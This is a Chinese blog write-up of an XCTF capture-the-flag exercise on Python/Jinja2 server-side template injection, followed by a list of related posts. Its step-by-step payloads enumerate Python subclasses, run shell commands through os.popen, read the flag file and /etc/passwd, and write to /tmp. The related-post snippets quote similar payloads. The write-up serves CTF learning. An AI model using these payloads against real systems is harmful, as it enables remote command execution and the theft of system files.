XCTF-Web-高手区-Web_python_template_injection

最新推荐文章于 2021-11-20 15:56:16 发布
原创 最新推荐文章于 2021-11-20 15:56:16 发布 · 439 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#XCTF-Web-高手区
本文详细解析了Python服务器模板注入(SSTI)漏洞,展示了如何通过payload测试、发现敏感信息并利用它来读写文件,同时提供了安全防范建议。

题目

在这里插入图片描述

解题

1、题目提示为python模板注入

猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式

2、测试一下

http://111.200.241.244:53038/{{1+1}}

在这里插入图片描述

经过该测试,说明存在SSTI

3、那么接下来可以使用相关payload进行验证

(1)payload1

查看所有模块
http://111.200.241.244:53038/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D

在这里插入图片描述

(2)payload2

查看当前目录,发现存在fl4g文件
http://111.200.241.244:53038/{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
或
http://111.200.241.244:53038/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

在这里插入图片描述

(3)payload3

读取fl4g文件
http://111.200.241.244:53038/{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}
或
http://111.200.241.244:53038/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

在这里插入图片描述

(4)其它payload

读取文件
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}  
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

在这里插入图片描述
写入文件

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}

参考:https://www.cnblogs.com/hackxf/p/10480071.html

XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1921
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
xctf Web_python_template_injection
最新发布
Furukawado的博客
05-04 1153
先看题,翻译了一下是模版注入,然后使用插件看一下发现是flask框架,注入点应该是这个。百度搜了一下大概有两个一个xss一个文件读取/命令执行有两篇较为详细的文章(虽然我没看太明白,但是确实详细,鄙人只会简单的开发知道flask框架下传值是需要{{}}的。那么先按照xss试一下,不可行但是可以发现有报错回显,开始尝试文件读取/命令执行结果如下开始找类的对象:{{''.__class__}}继续寻找基类:{{''.__class__.__mro__}}
XCTF---Web_python_template_injection
weixin_45895555的博客
05-28 572
python template injection (对于出学的我来说)python模板注入不熟。所以花了一天的时间看了不少文章,也慢慢了解了Flask/Jinja2.输入后显示 之后输入**{{config.items()}}是可以爆出一些内容的 这里有些内容较深就不细究了,当然没法得到有利信息。之后有偿试爆了一下类(看了文章,师傅说<type ‘file’>**类,它是文件系统访问的关键但是还没找到方法,所以 继续了一篇) ...
python’s revengepython反序列化
bfd9988的博客
06-05 709
python’s revengepython反序列化一、反序列化库pickle简介二、题目分析三、小结 这是Hitb中的一道题、python的复仇,给我印象很深。我还本地复现了一下,得到了一些小结论,在此分享一下,希望对大家有点帮助。 一、反序列化库pickle简介 在分析题目之前,先大概讲讲题目里涉及的用于反序列化的pickle库。还有一个库叫cPickle,用C语言写成,性能更佳,但不支持...
攻防世界XCTFWeb_python_template_injection
末初 · mochu7
03-13 988
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...
web python template injection_XCTF-WEB-高手进阶-Web_python_template_injection-笔记
weixin_40003283的博客
12-13 132
Web_python_template_injectiono(╥﹏╥)o从这里开始题目就变得有点诡谲了网上搜索相关教程的确是一知半解,大概参考了如下和最后的WP:http://shaobaobaoer.cn/archives/660/python-flask-jinja-sstihttps://xz.aliyun.com/t/3679#toc-8(这篇讲的特别好)https://blog.csd...
XCTF 攻防世界】WEB 高手进阶 Web_python_template_injection
weixin_45844670的博客
08-31 364
打开链接 只有一行字 提示这是python模板注入 也就是说可能是jinjia2、djingo、tornado中的一个模板 这里涉及到flask的ssti漏洞(服务端模板注入)。 简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使 用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。 举个例子 请求:xxxxxx.xxx/{{ 10*10 }} 响应:xxxxx.xxx/{{100}} Not Found! ...
XCTF WEB 高手进阶 Web_python_template_injection
qq_30076719的博客
11-05 283
打开网页,如下所示: 翻译可得,模板注入 既然是模板注入,那就要普及一点常识, 模板注入的意思就是,遗一串指令代替变量传入模板中让他执行,好吧,听起来有点难理解,那就直接理解为:在连接后面加:/{{}},而括号里面是可以执行一些简单的指令,比如输入1+1,就会输出2 然后,百度一下常用的payload(把常用的payload记住!!!) {{’’.class.mro[2].subclasses()[71].init.globals[‘os’].popen(‘ls’).read()}} 其中里面的ls就是
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6750
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
2020.3.31 xctf(Web_python_template_injection)①
DSR446的博客
03-31 432
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 {{''.__class__.__mro__[2].__subclasses__()}} {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].list...
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3725
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF攻防世界web进阶练习_ 5_mfw
silence1_的博客
05-02 3661
XCTF攻防世界web进阶练习—mfw 题目 题目为mfw,没有任何提示。 直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化 查看它的源码,看到有一个?page=flag,flag应该在这个页面里面 但是进入这个页面发现是空的 注意到有这样一个页面,说道用到了Git方法,想到是否可能和Git源码泄露有关 于是试一下http://111.198.2...
[wp] 攻防世界-i-got-id-200
MercyLin的博客
09-10 3491
点击Files,这里会把上传的文件的内容在下方输出,猜测后台逻辑: use strict; use warnings; use CGI; my $cgi= CGI->new; if ( $cgi->upload( 'file' ) ) { my $file= $cgi->param( 'file' ); while ( <$file> ) { print "...
XCTF python-trade
YenKoc的博客
01-15 734
一.查看文件类型 后缀名为pyc,说明是python字节码文件,python和java在编译方式上很像,都是编译兼并解释型,先编译成字节码,在虚拟机上解释成机器代码。 二.反编译 三.写个exp 分析每个字符的acsill值都先异或32,再加,之后base64编码 那么逆向回来的话,先base解码,再减少,再异或,转成字符串。 import base64 correct ='XlNkVmtUI1...
攻防世界web进阶之Web_python_template_injection
胖虎很忙
10-11 3714
(1)简单探测 http://111.198.29.45:42611/{{7+7}} 返回 URL http://111.198.29.45:47259/14 not found 证明执行了这个命令, (2)http://111.198.29.45:47259/{{config.items()}} 查看系统配置; (3)读取passwd信息 {{ [].class.base.subc...
[渗透测试笔记] 15.python模板注入
H4ppyD0g的博客
08-28 1393
python的html模板使用 def test(): code = request.args.get('id') html = ''' <h3>%s</h3> ''' % (code) return render_template_string(html) 当我们访问页面的时候,py代码通过requests.args.get来获取’id’的值赋给code,然后生成html,然后render_template_string来渲染网页。 模板注入 就是指 将
python template injection_XCTF-web_python_template_injection
weixin_29906279的博客
12-30 212
web_python_template_injection这里涉及到flask的ssti漏洞(服务端模板注入)。简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。例如:@app.route('/')def hello_world():return 'Hello Wor...
[wp] 攻防世界 ics-02
MercyLin的博客
09-29 3028
进去扫目录发现/secret 无法直接进入secret_debug.php 显示ip不对 点paper会向download.php传参,可以下载一个ssrf内容的pdf, 于是想到利用ssrf来访问secret_debug.php 发现参数s,fuzz一下,发现s=3时会有如下返回 经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下: import requests impor...
HITCTF2018-web全题解
蚁景网安学院
02-07 3413
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
Web_python_template_injection攻防世界ctf web
weixin_45689999的博客
03-03 1411
Web_python_template_injection flask是使用Jinja2来作为渲染引擎的。看例子 在网站的根目录下新建templates文件夹,这里是用来存放html文件。也就是模板文件。 看到template injection可以猜到是SSTI(Server-Side Template Injection) 服务端模板注入 {{}}在Jinja2中作为变量包裹标识符,所以在{{...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值